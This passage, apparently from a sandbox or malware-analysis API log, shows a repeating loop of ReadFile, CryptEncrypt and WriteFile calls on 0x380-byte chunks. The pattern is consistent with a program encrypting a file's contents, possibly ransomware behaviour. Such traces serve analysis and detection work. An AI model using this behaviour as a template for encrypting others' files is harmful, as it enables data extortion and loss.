pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.451] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.451] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.451] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.451] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.451] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.451] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.451] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.451] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.451] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.451] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.451] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.451] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.451] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.452] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.452] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.452] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.452] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.452] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.452] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.452] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.452] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.452] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.452] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.452] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.452] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.453] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.453] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.453] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.453] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.453] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.453] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.454] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.454] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.454] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.454] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.454] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.454] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.454] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.454] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.454] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.454] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.454] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.454] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.455] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.455] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.455] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.455] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.455] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.456] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.456] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.456] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.456] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.456] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.456] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.456] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.456] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.456] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.456] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.456] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.456] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.456] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.457] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.457] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.457] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.457] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.457] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.457] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.457] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.457] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.457] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.457] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.457] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.457] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.458] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.458] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.458] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.458] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.458] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, 